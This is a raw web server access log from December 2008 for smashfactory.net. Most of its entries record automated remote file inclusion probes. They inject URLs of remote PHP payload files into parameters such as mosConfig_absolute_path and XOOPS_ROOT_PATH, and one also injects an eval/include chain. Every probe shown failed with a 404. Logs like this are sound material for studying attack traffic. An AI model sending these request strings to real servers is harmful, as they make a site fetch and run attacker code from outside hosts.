72.52.212.40 - - [03/Dec/2008:16:36:13 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:36:13 -0800] "GET /logs/access_080927.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:36:13 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:36:16 -0800] "GET /logs/access_080927.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:36:16 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:36:16 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:36:28 -0800] "GET /logs/access_080927.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:36:28 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:36:28 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.smashfactory.net"
216.117.175.247 - - [03/Dec/2008:16:36:38 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.smashfactory.net"
216.117.175.247 - - [03/Dec/2008:16:36:38 -0800] "GET /logs/access_080927.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.smashfactory.net"
216.117.175.247 - - [03/Dec/2008:16:36:38 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.smashfactory.net"
201.80.215.232 - - [03/Dec/2008:16:39:08 -0800] "GET /logs/access.log//technote7/data/errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
201.80.215.232 - - [03/Dec/2008:16:39:10 -0800] "GET /logs//technote7/data/errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
62.75.209.183 - - [03/Dec/2008:16:39:35 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
62.75.209.183 - - [03/Dec/2008:16:39:35 -0800] "GET /skin/zero_vote/error.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
62.75.209.183 - - [03/Dec/2008:16:39:36 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
195.137.143.11 - - [03/Dec/2008:16:40:17 -0800] "GET /logs/access.log%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
77.221.130.14 - - [03/Dec/2008:16:40:18 -0800] "GET /logs/scripts.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.smashfactory.net"
77.221.130.14 - - [03/Dec/2008:16:40:19 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.smashfactory.net"
77.221.130.14 - - [03/Dec/2008:16:40:19 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.smashfactory.net"
211.247.226.253 - - [03/Dec/2008:16:41:18 -0800] "GET /logs/access.log/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "smashfactory.net"
211.247.226.253 - - [03/Dec/2008:16:41:18 -0800] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "smashfactory.net"
211.247.226.253 - - [03/Dec/2008:16:41:19 -0800] "GET /logs/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "smashfactory.net"
77.221.130.14 - - [03/Dec/2008:16:41:54 -0800] "GET /logs/scripts.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.smashfactory.net"
77.221.130.14 - - [03/Dec/2008:16:41:54 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:42:01 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:42:01 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:42:01 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:42:59 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:42:59 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:42:59 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "smashfactory.net"
74.55.13.210 - - [03/Dec/2008:16:43:11 -0800] "GET /skin/zero_vote/login.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "smashfactory.net"
74.55.13.210 - - [03/Dec/2008:16:43:22 -0800] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "smashfactory.net"
74.55.13.210 - - [03/Dec/2008:16:43:22 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "smashfactory.net"
74.55.13.210 - - [03/Dec/2008:16:43:22 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "smashfactory.net"
91.121.2.160 - - [03/Dec/2008:16:43:42 -0800] "GET /logs/access_080927.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.smashfactory.net"
91.121.2.160 - - [03/Dec/2008:16:43:42 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.smashfactory.net"
91.121.2.160 - - [03/Dec/2008:16:43:43 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.smashfactory.net"
74.55.93.138 - - [03/Dec/2008:16:43:49 -0800] "GET /logs/access_080927.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sukhman.net/articles//gif/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.smashfactory.net"
74.55.93.138 - - [03/Dec/2008:16:43:50 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sukhman.net/articles//gif/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.smashfactory.net"
74.55.93.138 - - [03/Dec/2008:16:43:51 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sukhman.net/articles//gif/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.smashfactory.net"
77.234.201.114 - - [03/Dec/2008:16:44:03 -0800] "GET /includes/header.php?XOOPS_ROOT_PATH=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:44:55 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:44:55 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:44:55 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:45:09 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:45:10 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:45:10 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:45:29 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:45:29 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:45:29 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "smashfactory.net"
83.222.23.200 - - [03/Dec/2008:16:46:13 -0800] "GET /administrator/index.php?option=com_login&task=§ionid=&id=&mosConfig_absolute_path=http://drachen-magie.de/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
77.234.201.114 - - [03/Dec/2008:16:46:47 -0800] "GET /includes/header.php?XOOPS_ROOT_PATH=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
77.234.201.114 - - [03/Dec/2008:16:46:50 -0800] "GET /includes/header.php?XOOPS_ROOT_PATH=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:47:26 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:47:26 -0800] "GET /logs/scripts.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:47:26 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:48:38 -0800] "GET /logs/scripts.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:48:38 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:48:38 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:49:19 -0800] "GET /logs/scripts.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:49:19 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.smashfactory.net"
89.218.85.18 - - [03/Dec/2008:16:49:20 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.smashfactory.net"
89.36.39.203 - - [03/Dec/2008:16:49:44 -0800] "GET /administrator/index.php?option=com_login&task=§ionid=&id=&mosConfig_absolute_path=http://drachen-magie.de/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
89.36.39.203 - - [03/Dec/2008:16:51:40 -0800] "GET /administrator/index.php?option=com_login&task=§ionid=&id=&mosConfig_absolute_path=http://drachen-magie.de/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
84.21.71.133 - - [03/Dec/2008:16:57:13 -0800] "GET /logs/access.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.novoftp.xpg.com.br/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
84.21.71.133 - - [03/Dec/2008:16:57:20 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.novoftp.xpg.com.br/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
84.21.71.133 - - [03/Dec/2008:16:57:20 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.novoftp.xpg.com.br/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
38.103.63.62 - - [03/Dec/2008:16:58:50 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "smashfactory.net"